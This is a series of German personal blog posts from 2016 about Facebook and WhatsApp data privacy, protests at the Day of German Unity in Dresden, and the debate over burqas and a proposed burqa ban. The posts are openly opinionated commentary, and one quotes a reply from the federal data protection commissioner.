Und um nicht das Internet vollkommen verdammen zu wollen, hätte ich da noch einen kleinen Tipp: Warum drehen die Internetnutzer den Spieß nicht einfach um? Wer die genannten Möglichkeiten voll oder teilweise ausschöpft, um seine Daten gegenüber den Datenkraken zu verschleiern, kann z.B. eine dieser Datenkraken und zwar Facebook nutzen, um zu überprüfen, wie gut die eigenen Schutzmechanismen wirken. Denn Facebook bietet lustiger Weise die Möglichkeit, nachzusehen, weshalb ausgerechnet jene Werbeeinblendung angezeigt wird. Je unpräziser die Auswahlkriterien sind, desto besser hat die eigene Verschleierung funktioniert. Im Grunde kann man Facebook- Werbeeinblendungen als Indikator für das eigene Datenschutzkonzept missbrauchen 😉

 

Share Button

Tag der deutschen Uneinigkeit

Share Button

Im Jahr 2016 fanden die Feierlichkeiten  mit politischer Prominenz zum Tag der deutschen Einheit in Dresden statt. Dass die Örtlichkeit unglücklich gewählt wurde,   bestätigte sich durch  eine massive Präsenz von sogenannten Wutbürgern, die vorwiegend verbal die Teilnehmer der etablierten Parteien  bis hin zur Bundeskanzlerin zum Teil in beleidigender Form beschimpften.

Quelle: google.de
Quelle: google.de

Sogar der amerikanische Internetkonzern widmete diesem Ereignis temporär ein eigenes Logo.

Ausgerechnet in Ostdeutschland, wo Freiheit vor 1990 keinesfalls selbstverständlich war, schlägt zuweilen blinder Hass den Repräsentanten des vereinten Deutschlands entgegen. Irrsinnigerweise suchen die Protangonisten von Pegida, sogenannte Reichs- und Besorgtbürger sowie die  rechte Szene eine nicht vorhandene Legitimation für ihr Handeln in der Meinungsfreiheit, welche es ironischer Weise vor der Einheit in der ehemaligen DDR quasi nicht gab.

Offenkundig fehlt immer mehr Menschen die Gabe, Meinungsfreiheit von Beleidigung, Schmähung und Hetzparolen zu unterscheiden.  Dieser Tag ist der denkbar ungünstigste  Moment, der Welt zu zeigen, dass  man als Deutscher mit  der eigenen Regierung , deren Handeln und auch mit der eigenen Situation augenscheinlich unzufrieden ist. Jenseits der Staatsgrenzen müssen sich unsere Nachbarn verwundert betrachten, wie die Bürger eines wohlhabenden Landes auf hohem Niveau jammern.

Es entsteht der Eindruck, als würde das zurecht getadelte schlechte Management der Flüchtlingskrise Deutschland ins Chaos zu stürzen. Aber eigentlich verhindert die Gegenwehr von selbsternannten Rettern des Abendlandes ein Gelingen mehr als jene Migranten, die aus durchaus unterschiedlichen Hoffnungen nach Europa geflohen sind. Nicht alle sind Kriegsflüchtlinge und manche Migranten fallen tatsächlich unangehm auf. All diese Probleme löst man jedoch nicht damit, dass sich die eigene Bevölkerung in Gutmenschen und Besserdeutsche spaltet. Letztere skandieren auch gerne Parolen wie „Wir sind das Volk“, wobei sich längst nicht jeder mit dieser Definition verirrter Patrioten  identifizieren möchte. Wo waren all diese braven Bürger, als die Banken von ihren Steuergeldern gerettet wurden? Warum schimpften die besorgten Bürger nicht auf ihre Volksvertreter, als Finanzhaie, Zocker und Spekulanten den Staat ausplünderten? Islamophobie ist ja so einfach durch ein Kleidungsstück wie diese unheilvolle Burka zu erzeugen. Bad Banks hingegen sieht man eben nicht.

Verdient dieser Tag es eigentlich noch, ein Feiertag zu sein?

Share Button

Passivrauchen per WhatsApp!

Share Button

Herzlichen Dank an alle Benutzer des Messenger- Dienstes WhatsApp, welche den neuen und seit einigen Tagen gültigen Nutzungsbedingungen zugestimmt haben, insbesondere jene, die meine Telefonnummer in ihren Kontakten gespeichert haben.

Quelle: freeiconspng.com
Quelle: freeiconspng.com

Als Facebooknutzer habe ich peinlich genau darauf geachtet, dass keine persönlichen Daten der Öffentlichkeit Preis gegeben wurden. Was dennoch nicht vermeidbar war, habe ich fiktiv gestaltet. Einzig der Name entspricht der ungeschminkten Wahrheit, was im Prinzip auch ausreichen sollte. Trotz nerviger Aufforderungen habe ich meine Telefonnummer nie mitgeteilt. Denn die Telefonnummer ist ein ziemlich gutes Identifizierungsmerkmal und ist begehrt zur Erstellung von Nutzerprofilen. Das gehört zum Geschäftsmodell von Facebook.

Dank euch lieben Verwandten und Bekannten sowie Unbekannten, denen meine persönlichen Selbstbestimmungsrechte am Allerwertesten vorbeigingen, besitzt nun Facebook auch meine Telefonnummer mit dem dazugehörigen Namen, falls dieser in euren Kontaktdaten korrekt ausgeschrieben gespeichert war. Ich wollte niemals diese Daten herausgeben, aber ihr habt es einfach getan, ohne mich überhaupt zu fragen, ob ich es euch überhaupt erlauben würde. Auch wenn euch jeglicher Datenschutz egal ist und ihr euch exhibitionistisch durch die virtuelle Welt bewegen wollt, was gibt euch das Recht, diesen Lebensstil auch mir aufzuzwingen?

Was würdet ihr wohl dazu sagen, wenn plötzlich Staubsaugerverkäufer und Versicherungsvertreter sowie diverse Drückerkolonnen eure Wohnungstür ständig belagern würden, weil ich ihnen eure Adresse gegeben hätte?

Es ist ein wenig wie Passivrauchen oder Fluglärm. Es ist unverschämt, rücksichtlos und ignorant zugleich, andere Menschen in Mitleidenschaft zu ziehen, um eigene Interessen durchsetzen zu wollen.

Hintergrundinfos: http://soznet.org/654-2/

Anmerkung:

twitter_kommentare

Nicht ganz unberechtigt ist diese Kritik per Twitter. Im  ersten Moment mag es  absurd wirken,  einen solchen Artikel zu verfassen und selbst einen Facebook- Account zu besitzen.  Beschäftigt man sich etwas intensiver damit und kennt sich einigermaßen mit datenschutztechnischen Maßnahmen aus, kann man Facebook hervorragend als Indikator für die Wirkung eigener Datenschutzmaßnahmen verwenden.

facebook_werbung facebook_werbung1 facebook_werbung2

Facebook bietet nämlich die ausgesprochen informative Möglichkeit, sich anzuschauen, weshalb jene spezifische Werbung anzeigt wird.

Im 1. Fall stimmt lediglich der Einwahlknoten, der einmalig ein freier WLAN- Hotspot in St. Ingbert war. Schwerhörig bin ich glücklicherweise nicht und auch noch nicht in jenem gesetzten Alter.

Im 2. Fall könnte man immerhin annehmen, dass Facebook mein Alter kennt, allerdings habe ich meinen Geburtstag im Profil auf 1905 datiert. Also ist es ein sehr ungenauer Datenbestand, den Facebook über mich pflegt.

Auch im 3. Fall stochert Facebook bei der Analyse meines Datenprofils ziemlich im Dunkeln. Es ist Ihnen nur möglich, sehr vage Informationen über mich an ihre Werbepartner zu übermitteln. Mein falsches Geburtsdatum und die IP- Adresse des Proxyservers dessen Standort in Deutschland ist, ist quasi alles, was Facebook  von mir relativ gesichert weiß. Das ist fast nichts und falsch dazu und somit gut.

Der Einsatz von diversen Verschleierungsmaßnahmen und ein Mindestmaß an Freizügigkeit über die eigene Person zeigen effektive Wirkung. Wüssten Facebook’s Werbepartner, welch miserables Nutzerprofil ihnen der Datenkrake verkauft hat, würde es den Erfolg des Zuckerberg- Unternehmens erheblich ausbremsen, würden es viele andere Nutzer ähnlich handhaben.

Die Möglichkeit, dass man hier Kommentare mit dem Facebook- Profil verfassen kann, zwingt die Besucher, die tatsächlich Kommentare verfassen möchten, nicht dazu, es nicht auf die übliche Weise zu tun. Da auch auf dieser Internetpräsenz keine Tracker die Nutzerdaten erfassen und erst recht nicht an Facebook & Co. weiterleiten, ist diese Kritik ziemlich unberechtigt. Selbst nutze ich auch oft den Facebook- Account für Kommentare auf diversen Internetpräsenzen, da ich dadurch nicht überall einen eigenen Account anlegen muss. Da mein Facebook- Account quasi ohne Aussagekraft ist, erhält Facebook bestenfalls die Information, dass ein über 100 Jähriger, der am südlichsten Zipfel Südamerikas lebt, dennoch sich permanent in Deutschland aufzuhalten scheint, in einer Baumschule und in  Oxford  bildungstechnisch umtriebig war und von Beruf der Pressesprecher der fiktiven Diktatur Omnibrain aus einem Computerspiel zu sein vorgibt…

 

 

 

Share Button

What’s wrong with WhatsApp?

Share Button

Die im August 2016 geänderten Nutzungsbedingungen beim beliebten Messenger- Dienst WhatsApp sorgen unter den Anwendern für Irritationen.

Die wohl umstrittenste und auch datenschutzkritischste Änderung stellt die Weitergabe der eigenen Telefonnummer sowie die Daten aus dem Adressbuch des Smartphones an den Mutterkonzern Facebook dar. Außerdem wird auch das individuelle Nutzungsverhalten des WhatsApp- Anwenders weiter gegeben.

Quelle: whatsapp
Quelle: whatsapp

Das personalisiert den WhatsApp- Nutzer nun für Facebook, auch wenn dieser gar keinen Facebook- Account besitzt. Man muss die Formulierungen sehr genau beachten, denn sie werden oft und auch gerne falsch interpretiert.

Wenn du ein bestehender Benutzer bist, kannst du wählen, deine Account-Informationen nicht mit Facebook zu teilen, um deine Facebook-Werbung und Produkterlebnisse zu verbessern.

Die Facebook-Unternehmensgruppe wird diese Information trotzdem erhalten und für andere Zwecke, wie Verbesserung von Infrastruktur und Zustellsystemen, des Verstehens der Art der Nutzung unserer bzw. ihrer Dienste, der Absicherung der Systeme und der Bekämpfung von Spam, Missbrauch bzw. Verletzungshandlungen.

Ob viele Nutzer nun diese Nutzungsbedingungen nicht richtig verstehen oder unbewusst falsch interpretieren, es bleibt schlichtweg Tatsache, dass WhatsApp zukünftig die Telefonnummern aller Nutzer an Facebook weiter gibt. Es ist außerdem ein Trugschluss zu glauben, dass hierfür der WhatsApp- Nutzer auch gleichzeitig einen Facebook- Account besitzen müsste. Das ist völlig irrelevant und steht auch gar nicht so im Text. Technisch spielt das nämlich keine Rolle.

Was man lediglich mit der Verweigerung dieser Zustimmung erreichen kann, ist, dass Facebook, sofern auch ein Facebook- Account des WhatsApp- Nutzers existieren würde, diese Daten nicht mit anderen Facebook- Nutzern und Werbepartnern automatisch „geteilt“ werden und damit die personalisierte Werbung bei Facebook optimiert wird im Sinne der Werbepartner. Es ist mit keinem Wort dargelegt worden, dass die Daten nicht zu anderen Zwecken verwendet werden. Davon ist allerdings auszugehen und wird auch so in den Nutzungsbedingungen bestätigt. So darf man davon ausgehen, dass mit dem Kriterium „Telefonnummer“ die Personalisierung von Nutzerprofilen sehr genau werden wird. Man darf natürlich auch damit rechnen, dass diese wertvollen Daten monetär genutzt werden, wenn auch nicht direkt als Facebook- Werbeeinblendung.

Man kann also konstatieren, dass mit Nutzerdaten von WhatsApp- Anwendern irgendwie irgendwo Datenbanken von Facebook gespeist werden. Wie diese Daten schließlich verwendet werden, bleibt völlig unklar.

Ein weiteres negatives Highlight der neuen Nutzungsbedingungen von WhatsApp stellt diese Passage dar:

Du stellst uns regelmäßig die Telefonnummern von WhatsApp-Nutzern und deinen sonstigen Kontakten in deinem Mobiltelefon-Adressbuch zur Verfügung. Du bestätigst, dass du autorisiert bist, uns solche Telefonnummern zur Verfügung zu stellen, damit wir unsere Dienste anbieten können.

Es wird jedem WhatsApp- Anwender schwer fallen, bestätigen zu können, dass man autorisiert ist, die Telefonnummern aller gespeicherten Kontakte auf dem Mobilgerät an Facebook weiter zu geben. Genau genommen macht man sich strafbar bzw. juristisch angreifbar, wenn man WhatsApp weiterhin benutzt. Man könnte bestenfalls alle Kontaktdaten entfernen, wovon nicht explizit eine Einwilligung zur Weitergabe derer Daten vorliegt. WhatsApp bzw. Facebook versucht sich mit dieser Klausel geschickt aus bestehenden Datenschutzrichtlinien heraus zu winden und verlagert sicher eintretende Verstöße auf seine Anwender. Das ist einerseits extrem fies und andererseits bestimmt bald ein Thema für den Bundesdatenschutzbeauftragten bzw. für den Bundesjustizminister.

Wer unter diesen Umständen weiterhin WhatsApp nutzen sollte, verhält sich gegenüber all seinen Kontakten im Adressbuch höchst verantwortungslos. Was jeder Einzelne dazu veranlasst, seine persönlichen Daten an Konzerne und völlig unbekannte Dritte heraus zu geben, ist dagegen die eigene freie Entscheidung.

Update 16. September 2016:

Die Bundesbeauftragte für den Datenschutz und die Informationsfreiheit

Az. 24-501-1 II#2613

Sehr geehrter Herr B.

haben Sie vielen Dank für Ihre Anfrage vom 1.9.2016, in der Sie die Änderungen der Nutzungsbedingungen von WhatsApp kritisieren. Mit den Änderungen wird festgelegt, dass WhatsApp die Mobilfunkrufnummer des Nutzers und alle in seinem Adressbuch verzeichneten Rufnummern für Werbezwecke an Facebook weitergibt, unabhängig davon, ob es sich um Nutzer von Facebook handelt.

WhatsApp wurde im Herbst 2014 von dem US-amerikanischen Unternehmen Facebook übernommen. Die zunächst geltende Zusicherung, die Daten beider Dienste getrennt zu halten, wird mit den neuen Nutzungsbedingungen aufgehoben. Dem Nutzer wird lediglich ein befristetes Widerspruchsrecht und dies auch nur für die Nutzung der Rufnummer eingeräumt, die Weitergabe findet in jedem Fall statt.

Als Anbieter eines Telekommunikationsdienstes unterfällt WhatsApp, soweit deutsche Nutzer betroffen sind, den Regelungen des Telekommunikationsgesetzes (TKG). Danach ist die Übermittlung der Rufnummern an eine andere Stelle nicht zulässig, es sei denn, der Nutzer hat ausdrücklich eingewilligt. Auch die geforderte Bestätigung des Nutzers, dass die Zustimmung aller Kontakte zur Weitergabe der Daten eingeholt wurde, ist in Frage zu stellen.

Ich habe WhatsApp auf den Verstoß gegen deutsches Telekommunikationsrecht hingewiesen und zur Stellungnahme aufgefordert.

Unabhängig davon hat sich nach hiesigen Informationen auch die US-amerikanische Federal Trade Commission (FTC) eingeschaltet. Nach dortigem Recht liegt ein Verstoß gegen eine Anordnung der FTC vor, wonach sowohl Facebook als auch WhatsApp verpflichtet sind, bei Änderung der Geschäftspraktiken hinsichtlich der Verwendung der WhatsApp-Nutzerdaten die ausdrückliche Einwilligung des einzelnen Nutzers einzuholen.

Mit freundlichen Grüßen

**********************************************

Die Bundesbeauftragte für den Datenschutz

und die Informationsfreiheit

Referat ZA

– Servicebüro –

Husarenstr. 30

53117 Bonn

Tel.: +49 (0)228 997799-0

Fax:  +49 (0)228 997799-550

E-Mail: servicebuero@bfdi.bund.de

***********************************************

 

Share Button

Des Königs neue Kleider

Share Button

Eher selten verwende ich für Artikel die erste Person Singular. Weil ich aber in diesem Fall meine ganz persönliche Sichtweise präsentiere, wird es ausnahmsweise so sein.

Seit Monaten tobt eine heftige Debatte über Kleidungsstücke angeblich religiösen Ursprungs. Es geht augenscheinlich um traditionelle Verhüllungspraktiken muslimischer Frauen. Die Vollverschleierung Burka und die geringfügig freizügigere Variante Niqab sowie der aus konservativ muslimischer Sicht halbwegs badetaugliche Burkini sorgen für Wirbel und diverse Irritationen.

Mir ist es grundsätzlich egal, wie sich Leute kleidungstechnisch in der Öffentlichkeit darbieten. Ich sehe auch keinen direkten Zusammenhang zwischen diesen Kleidungsstücken und einer davon ausgehenden Terrorgefahr. Ich beobachte allerdings eine schleichende Zunahme dieser Kleidungsstücke, was durchaus der erhöhten Migration aus islamischen Ländern geschuldet sein mag.

Ich habe mir auch von Leuten, die den Koran, also quasi die in Worte gefasste Formelsammlung jener muslimischen Religion, erklären lassen, dass Frauen gleichberechtigt gegenüber Männern gestellt seien und es keine religiösen Zwänge geben würde, dass Frauen sich verhüllen müssten.

Jedoch ist das alles interpretationsoffen und extreme Gruppierungen wie die Salafisten besitzen hierzu deutlich andere Vorstellungen. Insbesondere Saudi- Arabien verfolgt recht restriktive Auslegungen des Koran und der Islam ist dort Staatsreligion und bestimmt das Leben der Menschen. Frauen sind in diesem Land definitiv nicht gleichberechtigt und werden zu vielen Dingen gezwungen bzw. man verwehrt ihnen die Teilhabe am gesellschaftlichen Leben. Muslimische Frauen müssen sich in der Öffentlichkeit verhüllen, sonst droht Strafe.

Ein Schnappschuss wie das folgende Bild hätte sicher dramatische Folgen zumindest für die weiblichen Badenixen.

saudische Königsfamilie
Quelle: Facebook (Bernadette Lirakis)

Pikant an dem Foto ist jedoch der  Umstand, dass es sich bei den Personen um Mitglieder der saudischen Königsfamilie handelt, die an der französischen Mittelmeerküste von ihrer Yacht aus ziemlich weltoffenes Badevergnügen zelebrieren.  Die Analogie zur Überschrift wird damit hergestellt.

Mir ist das übrigens schon wieder egal. Doch was sagen jene Frauen dazu, die angeblich aus religiösen Gründen ihren Körper in der Öffentlichkeit bedecken? Was sagen jene Frauen dazu, die gezwungen werden, sich verhüllen zu müssen?

In westlichen Kulturkreisen haben Frauen lange für ihre Emanzipation kämpfen müssen. Was würden wohl diese Frauen zu muslimischen Frauen sagen wollen, die freiwillig auf die eigene Emanzipation verzichten?

Und tatsächlich gibt es doch einen Bezug zwischen der Verschleierung der Frau und dem islamistischen Terror. Denn diese Extremisten verwenden diese Zwangsverschleierung als ein Symbol ihres selbst ausgerufenen Kalifats.  Jede Frau, die verschleiert, insbesondere in weltoffenen, demokratischen Ländern ihre Religiosität präsentiert, setzt damit ein Zeichen für diese Extremisten. Die Vollverschleierung von Frauen stellt sowohl eine Inszenierung einer restriktiven Auslegung ihrer Religion als auch eine unbewusste Instrumentalisierung durch religiöse Fanatiker dar.

Das kann und darf man anders einschätzen, jedoch hat längst der Konflikt zwischen den religiösen Fanatikern und aus deren Sicht den Ungläubigen auf einer noch gewaltfreien Ebene begonnen. Das Grundrecht auf Religionsfreiheit wird bewusst überstrapaziert, um demokratische Werte gegeneinander auszuspielen. Bereits die höchsten juristischen Instanzen beschäftigen sich in Mitgliedsstaaten der EU inzwischen mit lapidaren Kleidungsstücken.  Der politische Rechtsruck, der in der gesamten europäischen Union nicht zu ignorieren ist, bekommt auch durch diesen Konflikt ideologische Nahrung. Selbstzerstörende Elemente der Demokratie wurden längst frei gesetzt.

Share Button

Scheiß Burka(verbot)

Share Button

Natürlich sind es wieder die erzkonservativen Fundamentalisten von CDU und CSU, welchen offensichtlich die Vollverschleierung von muslimischen Frauen wichtiger erscheint als das Lösen dringlicherer Probleme in unserer Gesellschaft. Als Wahlkampfposse mit der Wirkung einer mit Wucht ins Holz getriebenen Axt, spaltet das Thema die Nation. Sei es drum, so sollen eben 2 Quadratmeter Stoff die anstehenden Landtags- und womöglich sogar die Bundestagswahl entscheiden…

Als  Burka bezeichnet man jenes Gewand, worunter sich in der Regel eine Frau verbirgt, die durch eine Art Gitter vor den Augen nur eingeschränkt die Umgebung wahrnehmen kann. Die Light- Version davon bezeichnet man als Niqab, wo immerhin die obere Gesichtshälfte um die Augen partiell zu sehen ist. Zwar ist meistens nur die Rede von einem Burka- Verbot, jedoch dürfte auch der Niqab damit gemeint sein.

Nun lautet der Artikel 4 Absatz 1 & 2 des deutschen Grundgesetzes folgendermaßen:

 (1) Die Freiheit des Glaubens, des Gewissens und die Freiheit des religiösen und weltanschaulichen Bekenntnisses sind unverletzlich.

(2) Die ungestörte Religionsausübung wird gewährleistet.

Damit hat sich der Gesetzgeber wahrhaftig ein gesellschaftspolitisches Eigentor geschossen, sofern man diese beiden Sätze völlig losgelöst aus den Kontext des Gesamtwerkes betrachtet.

Unabhängig davon, dass man einer Burka- tragenden Person nur äußerst selten in diesem Land begegnen wird, erweckt dieses scheinbar religiöse Symbol bei kulturell und gesellschaftlich anders geprägten Menschen mindestens Unbehagen. Als in den achtziger Jahren die Punker mit schrillem Outfit provokativ ihren Lebensstil zur Schau stellten, wurde das ebenfalls belächelt bis verurteilt. Mit Religion haben alle Paradiesvögel, die sich absichtlich von der Masse zumindest optisch abheben wollen, kaum bis gar nichts am Hut. Verboten hat man Ihnen das dennoch nicht.

Allerdings war es ein Zeichen von selbstbestimmter Ausgrenzung gegenüber der restlichen Gesellschaft, eher selten als Modetrend zu interpretieren. Nun kann man auch vermuten, dass die Burka bzw. der Niqab als Ausgrenzungsmittel von Muslimen gegenüber der freien, demokratischen Gesellschaft verwendet wird. Es wirkt auf viele Menschen eben so, als wollte die Trägerin einer Vollverschleierung damit zum Ausdruck bringen, dass sie sich damit dem fremden Kulturkreis entziehen möchte. Genau genommen tut sie das auch, denn damit sendet sie ein Signal aus, das entsprechend von der vorwiegend kulturell anders geprägten Umwelt gedeutet wird. Das mag sie selbst womöglich völlig anders sehen.

Tatsächlich wird nicht eindeutig jene Vollverschleierung in der muslimischen Glaubenslehre vorgeschrieben. Entweder kann die Frau selbst entscheiden, ob und wieweit sie sich verhüllt oder es wird ihr von der Familie oder dem Ehepartner auferlegt. Letzteres entspricht weder der im Grundgesetz verbrieften Religionsfreiheit noch dem Islam als Glaubensdoktrin.

Teilweise versuchen immer wieder Muslime auf Grundlage des Grundgesetzes, also des Rechtes auf freie Glaubensausübung, nicht nur das Tragen der Burka durchzusetzen. Es gab sogar schon Rechtsstreits wegen Kopftüchern, was im Prinzip albern klingt. Auch an verschiedenen Universitäten wollten Muslime bereits die Möglichkeiten des täglichen Gebetes in eigens dafür zur Verfügung gestellten Räumlichkeiten durchsetzen. Das kann man tun. Dennoch sollte man zuvor etwas darüber nachdenken, ob es sinnvoll und zielführend ist, die Grenzen eines demokratischen Rechtsstaates auszuloten. Zur freien Ausübung des Glaubens gehört auch die Vernunft, andere Menschen damit nicht zu belästigen. Es wirkt mitunter penetrant, wenn Menschen aus anderen Kulturen, wo bisweilen Demokratie lediglich ein Fremdwort darstellt und die Trennung von Kirche und Staat undenkbar wäre, auf Rechte pochen, welche sie in ihrer ursprünglichen Heimat nie zugestanden bekommen würden. In islamischen Ländern haben Anhänger anderer Glaubensbekenntnisse oft einen schweren Stand.

Dass der internationale Terrorismus vorwiegend mit dem Islam in Verbindung gebracht wird, ist nicht die Schuld des Islam, aber auch nicht die Schuld derer, die es so empfinden, weil jener Terror von den Terroristen sehr bewusst über den Islam transportiert wird. Muslime müssen es begreifen, dass nur sie diesen Terror, den sie ja selbstredend ebenfalls verurteilen, beenden können, indem sie ihre Religion harmonisieren und gegen die Auslegungen von Extremisten unantastbar machen. Das geschieht schlichtweg nicht. Dadurch suchen sich Menschen Symbole, welche den Terror, der ja weder greifbar noch vorhersehbar ist, identifizieren sollen. Die Burka als schwarzes Gewand, welches seine Trägerin in einer Anonymität verschwinden lässt, bietet sich geradezu als ein solches Feindbild an.

Es liegt in der Natur des Menschen, das Unerklärliche erklären zu wollen, das Unsichtbare sichtbar zu machen und das Unvorstellbare vorstellbar zu machen. Dafür bedient er sich seit seiner Entstehung Symbolen, Kultstätten, Fetischen oder Gottheiten. Dabei ist die Burka eigentlich nur ein eher trostloses, farbloses und unpraktisches Kleidungsstück, wovon keine reale Bedrohung ausgeht…

 

 

Share Button